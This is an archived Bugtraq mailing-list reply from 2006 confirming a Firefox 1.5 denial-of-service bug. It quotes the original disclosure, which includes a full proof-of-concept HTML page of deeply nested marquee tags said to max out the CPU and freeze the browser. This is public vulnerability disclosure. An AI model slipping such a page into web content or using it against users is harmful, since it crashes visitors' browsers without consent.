Bugtraq mailing list archives
Re: Fire fox dos exploit
From: pagvac <unknown.pentester () gmail com>
Date: Wed, 31 May 2006 14:59:24 +0100
Successfully tested on Firefox 1.5.0.3. I had to kill my firefox.exe process after half a minute of freezing :-) On 30 May 2006 12:03:36 -0000, co296 () aol com <co296 () aol com> wrote:
I have found a problem which causes denial of service on fire fox browser Creadit:to n00b for finding this bug.. the problem lie's in the <marquee> html tag uses 100% cpu and crash's the browser.. Following proof of concept available <html> <head> <title>Credit to n00b..</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
ue
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </body> </html>
-- pagvac [http://ikwt.com]
Current thread:
- Re: Fire fox dos exploit pagvac (Jun 04)
- <Possible follow-ups>
- RE: Fire fox dos exploit Andy (Jun 04)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- RE: Fire fox dos exploit Jaroslaw Sajko (Jun 07)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Yannick von Arx (Jun 04)
- Re: Re: Fire fox dos exploit vincenzo . ampolo (Jun 04)
- Re: Fire fox dos exploit Phil Trainor (Jun 04)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Aaron Hopkins (Jun 04)
- Re: Re: Fire fox dos exploit al4321 (Jun 07)